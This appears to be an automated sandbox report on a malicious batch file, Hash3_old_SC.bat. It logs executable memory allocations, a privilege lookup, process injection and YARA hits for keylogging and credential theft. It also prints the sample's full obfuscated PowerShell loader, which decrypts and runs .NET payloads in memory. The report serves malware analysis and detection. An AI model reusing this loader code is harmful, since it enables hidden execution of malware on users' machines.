NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04aba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04abb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04abc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04abd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04abe000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04abf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 29, 2023, 2:08 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat.exe" -w hidden -c $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajTnAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC='EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAntPrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Replace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'.Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='MaijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA'.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptography.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aszSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[System.Convert]::$fkvT('Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW.IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$TIDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx);$QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compression.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]::$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$gfDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0])));$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]::$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null);

cmdline

C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2200 resumed a thread in remote process 196
NtResumeThread April 29, 2023, 2:08 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 196	1	0	0

Hash3_old_SC.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All